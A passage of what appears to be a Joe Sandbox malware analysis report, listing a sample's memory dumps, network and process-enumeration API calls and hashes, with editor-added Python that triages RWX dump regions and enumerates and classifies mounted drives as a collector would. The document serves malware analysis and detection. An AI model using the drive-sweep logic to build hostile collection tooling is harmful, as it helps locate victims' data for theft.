                                                            • Instruction ID: 77e328c758bbb4ce492a35bd147e1efe01528367eca14d10e5e63624ae273892
                                                            • Opcode Fuzzy Hash: 6798e38285bbc9f6348fa76c83b149d6e14a8aadc4bf941a20345fc7df2c1dba
                                                            • Instruction Fuzzy Hash: 0B21F871948284BAE7259B58DC42FF673BCEF81324F040615FA9853152FF32698A87E2
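The memory dump names quoted under "Memory Dump Source" encode where each dumped region lived and what page rights it had. The Python below, added here as an editor's example and not part of the report or of Joe Sandbox, splits those names and decodes the two fields whose values line up with Windows constants: the fifth field matches PAGE_* protection values (0x40 = PAGE_EXECUTE_READWRITE, 0x80 = PAGE_EXECUTE_WRITECOPY, 0x04 = PAGE_READWRITE) and the seventh matches MEMORY_BASIC_INFORMATION.Type (0x01000000 = MEM_IMAGE for the dumps marked "based on PE: true", 0x00020000 = MEM_PRIVATE for those marked "based on PE: false"). That field layout is an assumption inferred from the values, not documented format knowledge; every other field is kept as the raw string. The output that matters is the RWX flag: code executing from memory that is both writable and executable, whether inside the image at 0x6C1000 or in private memory at 0x74A0000 and 0x7420000, is where unpacked or self-modified code ends up, and those regions are the ones to disassemble first.

```python
"""Decode Joe Sandbox memory-dump (.sdmp) names as quoted in this report.

Editor's example, not part of the report or of Joe Sandbox. Field meaning is an
ASSUMPTION inferred from the values: field 5 matches Windows PAGE_* protection
constants and field 7 matches MEMORY_BASIC_INFORMATION.Type. Every other field
is kept as the raw string it was.
"""
from dataclasses import dataclass

# winnt.h page protection values (low byte) and modifier bits
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
EXEC_BITS = 0x10 | 0x20 | 0x40 | 0x80
WRITE_BITS = 0x04 | 0x08 | 0x40 | 0x80
# MEMORY_BASIC_INFORMATION.Type values
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}


@dataclass
class SdmpName:
    fields: tuple      # all eight dot-separated fields, untouched
    base: int          # field 4: region base address
    protect: int       # field 5: assumed PAGE_* value
    mem_type: int      # field 7: assumed MEM_* type

    @property
    def protect_name(self) -> str:
        names = [PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect & 0xFF:02x}")]
        names += [n for bit, n in PAGE_MODIFIERS.items() if self.protect & bit]
        return "|".join(names)

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:x}")

    @property
    def rwx(self) -> bool:
        # writable AND executable: where unpacked / self-modified code lives
        return bool(self.protect & EXEC_BITS) and bool(self.protect & WRITE_BITS)


def parse_sdmp_name(name: str) -> SdmpName:
    stem = name[:-5] if name.endswith(".sdmp") else name
    fields = stem.split(".")
    if len(fields) != 8:
        raise ValueError(f"expected 8 dot-separated fields, got {len(fields)}: {name!r}")
    return SdmpName(fields=tuple(fields), base=int(fields[3], 16),
                    protect=int(fields[4], 16), mem_type=int(fields[6], 16))


def triage(names) -> list:
    """One row per dump: (base, protection, type, 'RWX' or ''), RWX regions first."""
    rows = []
    for n in names:
        d = parse_sdmp_name(n)
        rows.append((f"0x{d.base:X}", d.protect_name, d.type_name, "RWX" if d.rwx else ""))
    return sorted(rows, key=lambda r: r[3] != "RWX")


if __name__ == "__main__":
    # Dump names as quoted in this report
    for row in triage([
        "00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp",
        "00000000.00000002.1589596663.00000000006C0000.00000004.00000001.01000000.00000003.sdmp",
        "00000000.00000002.1590876158.000000000112B000.00000080.00000001.01000000.00000003.sdmp",
        "00000000.00000002.1597554954.00000000074A0000.00000040.00001000.00020000.00000000.sdmp",
    ]):
        print(*row, sep="  ")
```

Run against the full list of names in a report, the rows flagged RWX are the dump files worth loading into a disassembler first; a MEM_PRIVATE region with execute rights that is not "based on PE" is code the sample created at run time.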

Control-flow Graph (basic blocks and their successors, recovered from the graph data; API and internal calls in parentheses)

• 6dd5e0-6dd5ee → 6dd5f0-6dd604 (call 6dd690), 6dd652-6dd662 (WSAStartup)
• 6dd652-6dd662 (WSAStartup) → 6dd664-6dd66f, 6dd670-6dd676
• 6dd670-6dd676 → 6dd5f0-6dd604 (call 6dd690), 6dd67c-6dd68d
• 6dd5f0-6dd604 (call 6dd690) → 6dd606-6dd614, 6dd61b-6dd651 (call 6e7620)
• 6dd606-6dd614 → 6dd616, 6dd61b-6dd651 (call 6e7620)
• 6dd616 → 6dd61b-6dd651 (call 6e7620)
                                                            APIs
                                                            • WSAStartup.WS2_32(00000202), ref: 006DD65B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: Startup
                                                            • String ID: if_nametoindex$iphlpapi.dll
                                                            • API String ID: 724789610-3097795196
                                                            • Opcode ID: 1eb9f94d9b90243544d3b10ae11369cc78661cd9243307957de0b31c381790f9
                                                            • Instruction ID: a47d6b86c0e7145ca647e5e6e3aa0a9478cdc280845b76a84b1d61234570d7eb
                                                            • Opcode Fuzzy Hash: 1eb9f94d9b90243544d3b10ae11369cc78661cd9243307957de0b31c381790f9
                                                            • Instruction Fuzzy Hash: C6012BD0D813C156EB117F3CAC173A625906B52308F44096ADC48D23D2F768C569C2E2
                                                            APIs
                                                            • socket.WS2_32(FFFFFFFF,?,00000000), ref: 0078AB9B
                                                            • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0078ABE4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: ioctlsocketsocket
                                                            • String ID:
                                                            • API String ID: 416004797-0
                                                            • Opcode ID: ec17cc3deb791a56879df0378e42c86781c90ab0cb53e3978dd9d377f85b0c5b
                                                            • Instruction ID: 5fff3c13547dc59aea0f0b593acae966f5840aec7e61ad9b54cf5c894e071043
                                                            • Opcode Fuzzy Hash: ec17cc3deb791a56879df0378e42c86781c90ab0cb53e3978dd9d377f85b0c5b
                                                            • Instruction Fuzzy Hash: 8DE1D270644301ABEB20DF14C885B6B77E5FF89314F044E2EF9988B291E779D944CB92
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597554954.00000000074A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_74a0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
• String ID: QZaZXj$ZXZX$aZXj (not text: these are printable single-byte x86 opcodes, 51 5A 61 5A 58 6A = push ecx / pop edx / popad / pop edx / pop eax / push imm8, so the "strings" are instruction bytes of the dumped code)
                                                            • API String ID: 0-2157119310
                                                            • Opcode ID: eecbaf5b7d0422ea4cc2dc06feb6a26b76ed7273b39939a5f3f842b7c852bffd
                                                            • Instruction ID: 814e192a425b911d9c1c817df08d13ee0900b739a491fca28a2a295294351f3e
                                                            • Opcode Fuzzy Hash: eecbaf5b7d0422ea4cc2dc06feb6a26b76ed7273b39939a5f3f842b7c852bffd
                                                            • Instruction Fuzzy Hash: FC21B3DB19D1167DA10291555F55EFB2A2EE6E3B30E308827F802E6492F2D1494A5071
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE(?,07420079,07420079), ref: 07420356
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597170262.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7420000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: 45579907333c7edce9fc672b24cd93263b7474c3f0ddad51ef1fee0c92daddd8
                                                            • Instruction ID: 1af8554c987bdca6759727978cdaa5ae94c13d898c3394ce1c0252e41d2877db
                                                            • Opcode Fuzzy Hash: 45579907333c7edce9fc672b24cd93263b7474c3f0ddad51ef1fee0c92daddd8
                                                            • Instruction Fuzzy Hash: E3414BE755C2317FA20280555B506FB27EDD9DB6307B1CD67F407C9621E1840AAB7171
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE(?,07420079,07420079), ref: 07420356
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597170262.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7420000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: 0031ffc41aa52b8faee6ceb76ff882588b432cb413d0656177972f29223e56f1
                                                            • Instruction ID: 61890d4b4e50395db18c1d457cbe04d50b204dadd4bbfe7150f2ad986a259631
                                                            • Opcode Fuzzy Hash: 0031ffc41aa52b8faee6ceb76ff882588b432cb413d0656177972f29223e56f1
                                                            • Instruction Fuzzy Hash: 0341E6E726C131BFA34281595B506FB17EDD9C7230BB1CD6BF407C6622E2944AAB7231
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE(?,07420079,07420079), ref: 07420356
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597170262.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7420000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: 68e98fea6476867c52cfb9dee4328909dd63edb4b3070f8b6ff53f6b383fff87
                                                            • Instruction ID: 6b3f57f1464382920278703885dd01cced4ec538c84d51f7ebd2e0ae37eef5dc
                                                            • Opcode Fuzzy Hash: 68e98fea6476867c52cfb9dee4328909dd63edb4b3070f8b6ff53f6b383fff87
                                                            • Instruction Fuzzy Hash: 5431E2E716C231BF6202C5595B50AFB27EDD5CB230BB1CD27F407C6A21E2944AABB131
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE(?,07420079,07420079), ref: 07420356
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597170262.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7420000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: a737aac5f061df6025504bd6a7dbacae7bf43127098937db99989784185e377d
                                                            • Instruction ID: fe52522fe0a32553fde593a97d9543706ba459cf082866d34c7cf3d8c23fc2a3
                                                            • Opcode Fuzzy Hash: a737aac5f061df6025504bd6a7dbacae7bf43127098937db99989784185e377d
                                                            • Instruction Fuzzy Hash: A631E4E716C231BF6202C5555B50AFA17EDD5D7330BB1CD27F407C6621E2944AABB231
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE(?,07420079,07420079), ref: 07420356
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597170262.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7420000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: eee9820d1e16b1dcd848deb6213b7aa6a53717125643159bd9a7d3ab96358cb8
                                                            • Instruction ID: d35122f9600ae47cf19b01827f647c73fa55cb4e5a59c8c5684e910f45879b16
                                                            • Opcode Fuzzy Hash: eee9820d1e16b1dcd848deb6213b7aa6a53717125643159bd9a7d3ab96358cb8
                                                            • Instruction Fuzzy Hash: B131A1EB26C131BF624280595B50AFB16EED5D7330BB1CD27F407C5A21E6D44AAB7131
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE(?,07420079,07420079), ref: 07420356
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597170262.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7420000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: 9021de8162f56ceacbdbccce2bdaed3e8c5238c6fc3651a4971344e16b3af6ac
                                                            • Instruction ID: 446b8486aef850ecd13e77a46024493881abce83098f636f7d11091fdeb63651
                                                            • Opcode Fuzzy Hash: 9021de8162f56ceacbdbccce2bdaed3e8c5238c6fc3651a4971344e16b3af6ac
                                                            • Instruction Fuzzy Hash: 0A3190E766C131BE724280596B50AFA16EED5DB730BB1CD27F407C5A21E2C84AAB7131
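The six entries above, each with a different opcode hash, all reference the same GetLogicalDrives call site (07420356) and the template string "A:\", which is consistent with the code at that address changing between snapshots. The bitmask the API returns is being expanded into per-volume root paths, the first step of any sweep over mounted drives. The Python below, an editor's example and not code from the sample or the report, performs the same expansion and, on Windows, calls the real API pair (GetLogicalDrives plus GetDriveTypeW); grouping by DRIVE_* type is how a collector picks fixed, removable or network volumes. The masks and drive-type mapping used off Windows are constructed; how this sample actually iterates is not shown in the report, so the loop is an assumption modelled on the usual pattern.

```python
"""Expand a GetLogicalDrives() bitmask into drive root paths.

Editor's example, not code from the sample or the report. The report shows only
that the function calls GetLogicalDrives and holds the template "A:\\"; the loop
below is the usual way that pair is used and is an assumption about this sample.
Masks and drive types used in __main__ off Windows are constructed.
"""
import ctypes
import sys

# GetDriveTypeW return values (winbase.h)
DRIVE_TYPES = {0: "DRIVE_UNKNOWN", 1: "DRIVE_NO_ROOT_DIR", 2: "DRIVE_REMOVABLE",
               3: "DRIVE_FIXED", 4: "DRIVE_REMOTE", 5: "DRIVE_CDROM", 6: "DRIVE_RAMDISK"}


def drives_from_mask(mask: int) -> list:
    """Bit 0 = A:, bit 1 = B:, ... bit 25 = Z:. Patches the first byte of the
    "A:\\" template per set bit, which is what such a string in a dump is for."""
    if mask < 0 or mask >> 26:
        raise ValueError(f"mask 0x{mask:x} does not fit in 26 drive bits")
    template = bytearray(b"A:\\")
    roots = []
    for bit in range(26):
        if mask >> bit & 1:
            template[0] = ord("A") + bit
            roots.append(template.decode("ascii"))
    return roots


def mask_from_letters(letters) -> int:
    """Inverse helper for building masks: 'ACD' -> 0b1101."""
    mask = 0
    for ch in letters:
        ch = ch.upper()
        if not "A" <= ch <= "Z":
            raise ValueError(f"not a drive letter: {ch!r}")
        mask |= 1 << (ord(ch) - ord("A"))
    return mask


def group_by_type(mask: int, type_of: dict) -> dict:
    """Group roots by DRIVE_* name; type_of maps root -> GetDriveTypeW code."""
    groups = {}
    for root in drives_from_mask(mask):
        name = DRIVE_TYPES.get(type_of.get(root, 0), "DRIVE_UNKNOWN")
        groups.setdefault(name, []).append(root)
    return groups


def live_drive_types() -> dict:
    """Windows only: the real API pair. Returns root -> GetDriveTypeW code."""
    k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    k32.GetLogicalDrives.restype = ctypes.c_uint32
    k32.GetDriveTypeW.argtypes = [ctypes.c_wchar_p]
    k32.GetDriveTypeW.restype = ctypes.c_uint32
    mask = k32.GetLogicalDrives()
    if mask == 0:                      # 0 means failure; details in GetLastError
        raise ctypes.WinError(ctypes.get_last_error())
    return {root: k32.GetDriveTypeW(root) for root in drives_from_mask(mask)}


if __name__ == "__main__":
    if sys.platform == "win32":
        types = live_drive_types()
        mask = mask_from_letters(root[0] for root in types)
    else:                              # constructed stand-in for a non-Windows host
        mask = mask_from_letters("ACDE")
        types = {"A:\\": 2, "C:\\": 3, "D:\\": 5, "E:\\": 4}
    for kind, roots in sorted(group_by_type(mask, types).items()):
        print(f"{kind:<16} {' '.join(roots)}")
```

For detection, the pair GetLogicalDrives followed by GetDriveTypeW over every set bit, shortly after process start and before any user interaction, is the behavioural signature to key on; the API by itself is also used by benign installers and backup tools.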
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: closesocket
                                                            • String ID: FD %s:%d sclose(%d)
                                                            • API String ID: 2781271927-3116021458
                                                            • Opcode ID: 1c3888170c46f6aec0752f00d28fbaea1bc85f2ced760d48ed344b2b2766581d
                                                            • Instruction ID: 3b4e308efc487d4a77edce1b344e6034fc1df9e3faeb06a7ea87a2127b370dd4
                                                            • Opcode Fuzzy Hash: 1c3888170c46f6aec0752f00d28fbaea1bc85f2ced760d48ed344b2b2766581d
                                                            • Instruction Fuzzy Hash: 69D05E32A192216B852069996C48D9BABA9DEC6F60F060C6DF94067304D2209D018BE6
                                                            APIs
                                                            • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,0078B29E,?,00000000,?,?), ref: 0078B0BA
                                                            • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00773C41,00000000), ref: 0078B0C1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastconnect
                                                            • String ID:
                                                            • API String ID: 374722065-0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597554954.00000000074A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_74a0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: QZaZXj$aZXj
                                                            • API String ID: 0-1138735442
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597554954.00000000074A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_74a0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: QZaZXj$aZXj
                                                            • API String ID: 0-1138735442
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597554954.00000000074A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_74a0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: QZaZXj$aZXj
                                                            • API String ID: 0-1138735442
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597554954.00000000074A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_74a0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: QZaZXj$aZXj
                                                            • API String ID: 0-1138735442
                                                            APIs
                                                            • Process32NextW.KERNEL32(0000B483,0000B483,?,?), ref: 07470486
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597497521.0000000007470000.00000040.00001000.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7470000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597497521.0000000007470000.00000040.00001000.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7470000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597497521.0000000007470000.00000040.00001000.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7470000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597497521.0000000007470000.00000040.00001000.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7470000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597497521.0000000007470000.00000040.00001000.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7470000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597497521.0000000007470000.00000040.00001000.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7470000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597497521.0000000007470000.00000040.00001000.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7470000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597497521.0000000007470000.00000040.00001000.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7470000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            APIs
                                                            • Process32NextW.KERNEL32(0000B483,0000B483,?,?), ref: 07470486
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597497521.0000000007470000.00000040.00001000.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7470000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597497521.0000000007470000.00000040.00001000.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7470000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597497521.0000000007470000.00000040.00001000.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7470000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597497521.0000000007470000.00000040.00001000.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7470000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            APIs
                                                            • Process32NextW.KERNEL32(0000B483,0000B483,?,?), ref: 07470486
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597497521.0000000007470000.00000040.00001000.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7470000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            APIs
                                                            • Process32NextW.KERNEL32(0000B483,0000B483,?,?), ref: 07470486
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597497521.0000000007470000.00000040.00001000.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7470000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            APIs
                                                            • Process32NextW.KERNEL32(0000B483,0000B483,?,?), ref: 07470486
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597497521.0000000007470000.00000040.00001000.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7470000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            APIs
                                                            • Process32NextW.KERNEL32(0000B483,0000B483,?,?), ref: 07470486
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597497521.0000000007470000.00000040.00001000.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7470000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            APIs
                                                            • Process32NextW.KERNEL32(0000B483,0000B483,?,?), ref: 07470486
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597497521.0000000007470000.00000040.00001000.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7470000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            APIs
                                                            • Process32NextW.KERNEL32(0000B483,0000B483,?,?), ref: 07470486
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597497521.0000000007470000.00000040.00001000.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7470000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            APIs
                                                            • Process32NextW.KERNEL32(0000B483,0000B483,?,?), ref: 07470486
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597497521.0000000007470000.00000040.00001000.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7470000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            APIs
                                                            • Process32NextW.KERNEL32(0000B483,0000B483,?,?), ref: 07470486
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597497521.0000000007470000.00000040.00001000.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7470000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            APIs
                                                            • Process32NextW.KERNEL32(0000B483,0000B483,?,?), ref: 07470486
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597497521.0000000007470000.00000040.00001000.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7470000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            APIs
                                                            • Process32NextW.KERNEL32(0000B483,0000B483,?,?), ref: 07470486
                                                            Memory Dump Source
